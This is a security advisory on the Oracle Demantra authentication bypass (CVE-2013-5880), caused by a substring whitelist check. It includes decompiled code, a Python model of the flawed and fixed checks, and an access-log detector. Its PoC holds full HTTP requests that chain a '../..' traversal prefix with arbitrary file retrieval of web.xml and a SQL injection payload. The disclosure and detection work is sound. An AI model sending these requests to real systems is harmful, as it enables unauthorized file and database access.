Oracle Demantra - Authentication Bypass (CVE-2013-5880)

Vulnerable Systems:

Description:

The application's authorization filter is broken by design: it decides whether a request may proceed unauthenticated with a substring match (indexOf()) against a whitelist of URLs, so any request whose path merely contains a whitelisted entry bypasses authentication.

Details:

Demantra uses an Authorization Filter that inspects each request made to the web application. The filter is driven by one main file, “authorizationUnsecureURLs.txt”, located in the security folder under the application root.
There is a vulnerability in the way the authorization filter matches the requested URL against this file that allows a remote attacker to bypass authentication.
authorizationUnsecureURLs.txt contains the list of all pages that can be accessed without an authenticated session. When opened the file looks like this:

#This file contains a list of all demantra URLs considered safe for an unauthenticated user.
#This means that anyone can access these pages, and no security checks whatsoever are done on requests
#for these pages.
#WARNING!!! CHANGING ANYTHING IN THIS FILE CAN SERIOUSLY AFFECT PROGRAM USABILITY AND/OR COMPROMISE SECURITY!!!!
#After altering page, for changes to take effect server must be restarted.
#Login
/portal/loginpage.jsp
/common/loginCheck.jsp
/portal/partnerLogin.jsp
/workflow/login.jsp
/LoginServlet
/portal/DOLLogin.jsp
/portal/remoteloginpage.jsp
/admin/adminManagement.jsp
/portal/userManagement.jsp
/portal/adminLogin.jsp
/portal/anywhereLogin.jsp
/portal/launchDPWeb.jsp
/common/changePassword.jsp
#Error Pages
/common/ForbiddenErrorPage.jsp
/portal/notAuthorizedAdmin.jsp
/workflow/notLoggedIn.jsp
/portal/notLoggedIn.jsp
/portal/generalErrorPage.jsp
/portal/notFoundErrorPage.jsp
#Engine
/BatchForecastServlet
/SimulationServlet
#BM
/ServerDetailsServlet
#DB
/NotificationServlet
#Integration
/common/prelogin.jsp
/WorkflowServer
#Other
/ConnectionServlet
/portal/checkSessionExpiration.jsp
The main class is located at:
  • WEB-INF/classes/com/demantra/security/server/authorization/AuthorizationFilter.class
The AuthorizationFilter class loads all the pages into a list and intercepts every request made to the application. The requested URL is then checked by the isSecureURL function, which is defined in:
  • WEB-INF/classes/com/demantra/security/server/SessionAuthenticationFilter.class
The (decompiled) function looks like this:
protected boolean isSecureURL(String url) {
    boolean isSecure = true;
    List safeUrls = getSafeUrls();  // entries read from authorizationUnsecureURLs.txt

    if (safeUrls != null) {
        for (Iterator i$ = safeUrls.iterator(); i$.hasNext();) {
            String safeUrl = (String) i$.next();
            // Substring test: any URL that merely *contains* a whitelisted
            // path is treated as safe for an unauthenticated user.
            if (url.indexOf(safeUrl) != -1) isSecure = false;
        }
    }
    return isSecure;
}
Each request is matched against the URL list defined in the authorizationUnsecureURLs.txt file. However, the code has a design flaw that can be exploited.

Let’s assume we have a URL like this:
  • demantra/common/loginCheck.jsp
The filter compares it with every whitelist entry using:
url.indexOf(safeUrl)
safeUrls holds the allowed URL list, which contains
  • /common/loginCheck.jsp
so the request is let through without authentication, as intended.
A malicious attacker can abuse this check because of the insecure use of indexOf(). Its definition reads:
int indexOf(String str)
Returns the index within this string of the first occurrence of the specified substring. If it does not occur as a substring, -1 is returned.
So the check only tests whether a whitelisted path occurs somewhere inside the requested URL; it never compares the full, normalised request path against the whitelist. That lets an attacker reach resources that should require an authenticated session.

Let’s assume an attacker wants to access:
  • /demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications&tkn=-308184887676887
This request would fail, as the user would need to be authenticated to access the above URL.
However, if the URL is constructed like:
  • /demantra/common/loginCheck.jsp/../../portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications&tkn=-308184887676887
the request succeeds: isSecureURL() returns false (i.e. "not secure, no session needed") because the string /common/loginCheck.jsp occurs in the URL and is a valid entry in the whitelist. The filter matches on the request URI as sent, with the /../.. sequence still in it, while the servlet container resolves the dot-segments when it dispatches the request, so the page actually served is /demantra/portal/editExecDefinition.jsp.
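To make the flaw concrete, the following Python model is an added example written for this page, not Demantra's own code. is_secure_url_vulnerable() reproduces the indexOf() substring test from the decompiled isSecureURL() above, and is_secure_url_fixed() shows the check a practitioner would want instead: the path is canonicalised first (query string dropped, one round of percent-decoding, ;path-parameters and dot-segments resolved, context root stripped) and then required to match a whitelist entry exactly. The whitelist subset, the /demantra context root and the request URIs are taken from the advisory; the normalisation helper is an assumption about how the container resolves the path, not code from the product.

```python
import posixpath
from urllib.parse import unquote

# Subset of authorizationUnsecureURLs.txt as reproduced in the advisory.
SAFE_URLS = [
    "/portal/loginpage.jsp",
    "/common/loginCheck.jsp",
    "/LoginServlet",
    "/common/ForbiddenErrorPage.jsp",
    "/portal/checkSessionExpiration.jsp",
]


def is_secure_url_vulnerable(url):
    """Model of Demantra's isSecureURL(): True means 'session required'.
    Mirrors the decompiled loop, including the substring match."""
    is_secure = True
    for safe in SAFE_URLS:
        if url.find(safe) != -1:      # Java: url.indexOf(safeUrl) != -1
            is_secure = False
    return is_secure


def normalize_path(url):
    """Canonicalise a request URI the way a servlet container resolves it
    before dispatch (assumption for this example, not Demantra code):
    drop the query string, percent-decode once, strip ;path-parameters
    from each segment and collapse '.' / '..' segments."""
    path = unquote(url.split("?", 1)[0])
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    norm = posixpath.normpath(path)   # '/a/b/../../c' -> '/c'; never escapes '/'
    if not norm.startswith("/"):
        norm = "/" + norm
    return norm


def is_secure_url_fixed(url, context_root="/demantra"):
    """Hardened check: normalise, strip the context root, then require an
    exact match against the whitelist instead of a substring hit."""
    path = normalize_path(url)
    if path.startswith(context_root + "/"):
        path = path[len(context_root):]
    return path not in SAFE_URLS


if __name__ == "__main__":
    for u in ("/demantra/common/loginCheck.jsp",
              "/demantra/GraphServlet",
              "/demantra/common/loginCheck.jsp/../../GraphServlet",
              "/demantra/common/loginCheck.jsp/..%2F..%2Fportal/editExecDefinition.jsp?menuBarId=2"):
        print("%-85s vulnerable=%-5s fixed=%s" % (u, is_secure_url_vulnerable(u), is_secure_url_fixed(u)))
```

Running the block prints one line per URL; the third and fourth rows are the bypass: the vulnerable check reports "no session required" because the whitelisted string is present, while the fixed check sees the resolved target (/GraphServlet, /portal/editExecDefinition.jsp) and demands authentication.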

POC:

For example the page:
  • /demantra/common/loginCheck.jsp
is accessible by an unauthenticated user and is therefore listed in the whitelist. This whitelisted path can now be used as a prefix to reach restricted URLs.
As an example, the Arbitrary File Retrieval vulnerability reported alongside this one can be exploited without authentication by changing the POST target from:
  • /demantra/GraphServlet
to:
  • /demantra/common/loginCheck.jsp/../../GraphServlet
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
The same prefix chains with the other reported vulnerabilities as well, for example the SQL injection, by sending the following request:
POST /demantra/common/loginCheck.jsp/../../portal/editExecDefinition.jsp HTTP/1.1
Host: target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.14.171:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 388

done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=
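For the defensive side, the following Python detector is an added example written for this page, not part of the original advisory or of Demantra. It scans Tomcat-style combined access-log lines for exactly the request shape the two PoC requests above use: a whitelisted entry from authorizationUnsecureURLs.txt followed by a ".." segment (plain or percent-encoded). The log lines are constructed sample input, the whitelist subset is copied from the file reproduced above, and the log format is an assumption about the deployment.

```python
import re
from urllib.parse import unquote

# Subset of authorizationUnsecureURLs.txt as reproduced in the advisory.
UNSECURE_URLS = [
    "/portal/loginpage.jsp",
    "/common/loginCheck.jsp",
    "/LoginServlet",
    "/common/changePassword.jsp",
    "/portal/checkSessionExpiration.jsp",
]

# Constructed sample lines in Tomcat's "combined" access-log layout; not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jan/2014:10:00:01 +0000] "GET /demantra/common/loginCheck.jsp HTTP/1.1" 200 1843
192.0.2.10 - - [10/Jan/2014:10:00:07 +0000] "POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1" 200 5120
192.0.2.10 - - [10/Jan/2014:10:00:09 +0000] "POST /demantra/common/loginCheck.jsp/..%2F..%2Fportal/editExecDefinition.jsp HTTP/1.1" 200 942
198.51.100.7 - - [10/Jan/2014:10:01:00 +0000] "GET /demantra/portal/loginpage.jsp HTTP/1.1" 200 3301
198.51.100.7 - - [10/Jan/2014:10:01:30 +0000] "GET /demantra/portal/editExecDefinition.jsp?menuBarId=2 HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# A '..' segment immediately after the whitelisted path.
DOT_SEGMENT = re.compile(r"/\.\.(?:/|$)")


def is_whitelist_traversal(uri):
    """True when a whitelisted path is followed by a '..' segment: the shape
    that satisfies indexOf() but resolves to a different resource."""
    path = unquote(uri.split("?", 1)[0])   # drop query, undo one encoding round
    for safe in UNSECURE_URLS:
        start = 0
        while True:                        # check every occurrence, not just the first
            idx = path.find(safe, start)
            if idx == -1:
                break
            if DOT_SEGMENT.match(path, idx + len(safe)):
                return True
            start = idx + 1
    return False


def scan_access_log(text):
    """Return (client, method, decoded uri, status) for each suspicious request.
    Lines that do not parse are skipped rather than aborting the scan."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_whitelist_traversal(m.group("uri")):
            hits.append((m.group("client"), m.group("method"),
                         unquote(m.group("uri")), m.group("status")))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("whitelist traversal: %s %s %s -> %s" % hit)
```

Because the traversal lives in the request path rather than in the body or query string, it is visible in the access log even for the POST requests above, whose parameters are never logged; a 200 status on such a line is the signal that the filter let the request through.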

Impact:

A remote, unauthenticated attacker could exploit this issue in combination with the other reported issues to extract data from the database or retrieve files from the system. This could also lead to arbitrary code execution.

Recommendation:

Please see the corresponding Oracle Critical Patch Update (CPU) advisory:
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.